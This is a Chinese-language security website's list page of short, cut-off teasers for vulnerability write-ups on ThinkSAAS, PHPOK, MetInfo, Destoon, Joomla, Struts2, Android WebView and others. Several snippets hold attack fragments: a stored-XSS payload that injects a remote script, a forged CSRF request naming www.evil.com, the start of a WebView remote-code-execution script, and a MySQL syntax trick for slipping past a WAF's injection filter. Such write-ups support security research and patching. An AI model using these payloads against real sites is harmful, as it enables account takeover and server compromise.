Thinksaas某处绕过过滤的注射及修复 - 网站安全关注热度:11

添加标签过滤不严。今天下了一个thinksaas 最新版， 就看了看在xfkxfk 爆了一些洞后 还是变安全了一些。 但是还是有很多依旧没过滤。xfkxfk 爆了app tag action add php我看的漏洞文件 app tag..[详情]

PHPOK CSRF获取管理员权限及修复 - 网站安全 - 自学关注热度:13

测试环境（PHPOK）：添加用户：抓包抓到如下内容：POST phpok admin php?c=adminf=save HTTP 1 1Host: www evil comProxy-Connection: keep-aliveContent-Length: 67Cache-Control: max-age=0Accept: t..[详情]

MetInfo系统备份文件在特定环境下可被任意下载关注热度:16

MetInfo系统备份文件在特定环境下可被任意下载Windows下采用了短文件名机制，如C: 2cto12312394944545 txt可采用C: 2cto~1 txt访问生成一个备份文件，文件名是这样的http: 127 0 0 1 admin databack sql m..[详情]

探索比邻妹子修改任意用户信息 - 网站安全 - 自关注热度:10

探索比邻妹子修改任意用户信息可以修改任意用户的个人信息。某哥们要是手一哆嗦就全改了。现在的时间已经可以说明，没错、我失眠了。在看完一部电影（XX女），突然提及比邻只给..[详情]

SupperRadius企业版V3.0 SQL注入漏洞 - 网站安全 - 自学关注热度:9

SupperRadius企业版V3 0 SQL注入漏洞SupperRadius企业版V3 0 SQL注射漏洞家里上网用的宽带恰好是用supperradius来计费的。在企业版中的web services存在一处SQL注射漏洞，能够查询、删除、修改数据库..[详情]

Joomla插件构造函数后门分析 - 网站安全 - 自学p关注热度:14

Joomla插件构造函数后门分析本文介绍我们在Joomla插件中发现的一个有（wei）趣（suo）的后门。尽管感觉有点不太对劲，不过由于代码组织良好，最开始我们没有意识到里面包含后门。插..[详情]

天宇手机官网伪静态SQL注入漏洞 - 网站安全 - 自关注热度:18

天宇手机官网伪静态SQL注入漏洞测试URL http: www k-touch cn product condetail prod_id 123 htmlweb server operating system: Windows 2003web application technology: ASP NET, Microsoft IIS..[详情]

那些年，那些 Apache Struts2 的漏洞 - 网站安全 - 自关注热度:16

每次 Apache Struts2 漏洞爆发都在互联网上掀起腥风血雨，我们整理了近年来 Apache Struts2 高风险漏洞的信息供大家参考。针对此次 Apache Struts2 的漏洞，绿盟科技已提供在线检查工具帮助大..[详情]

浅谈如何保证discuz插件安全 - 网站安全 - 自学p关注热度:16

1 非直接执行程序请加上if(!defined( IN_DISCUZ )) {exit( Access Denied );}2 记得过滤 比如说uid等id需要intval过滤,避免溢出 文字内容需要htmlspecialchars过滤避免内容变形(DZ内为dhtmlspecialc..[详情]

destoon新版短消息中心xss指谁打谁 - 网站安全 - 自关注热度:9

首先选取一个对象我们去发消息然后抓包，往里面填充我们的xss代码其中的xssimg src=x onerror=s=createElement( 39;script 39;);body appendChild(s);s src= 39;xsscode 39;;然后我们来试着点开该信息，..[详情]

UC浏览器HD版本远程代码执行漏洞 - 网站安全 - 自关注热度:18

浏览器来说这种问题还是需要修补的导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4 0手机上测试实际存在，4 2以上版本不存在function execute(cmdArgs){return searchBoxJavaBridge_ get..[详情]

Android WebView的Js对象注入漏洞解决方案 - 网站安关注热度:16

目录1使用场景2漏洞描述3漏洞证明4解决方案5一些思考最近在做一个项目过程中，发现了一个很严重的安全漏洞，这个漏洞是乌云平台报告出来的。1，使用场景我们很多时候要使用WebV..[详情]

Webshell下命令执行限制及绕过方法 - 网站安全 -关注热度:11

0times;00前言上传webshell后，执行命令时或许没法执行了，这时我们该分析下原理并想出绕过方式，防守方也必须根据绕过方式想想更强的防御 0times;01 php webshell执行命令原理php webshell（以..[详情]

Mysql语法绕过360scan insert防注入 - 网站安全 - 自学关注热度:14

360scan正则：INSERT s+INTO +?VALUES其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx =提交：1http: localhost 360 php?sql=insert into user (user,pass)..[详情]

PHPOK#XSS利用突破到GetShell第一发 - 网站安全 - 自学关注热度:11

数据库对存入进行过滤，但是取出来的时候，仍然可利用XSS完成GetShell 在线留言功能里面留言主题在存入数据的时候都进行了过滤数据库内容数据库的字段长度为255，可以写任何的数据..[详情]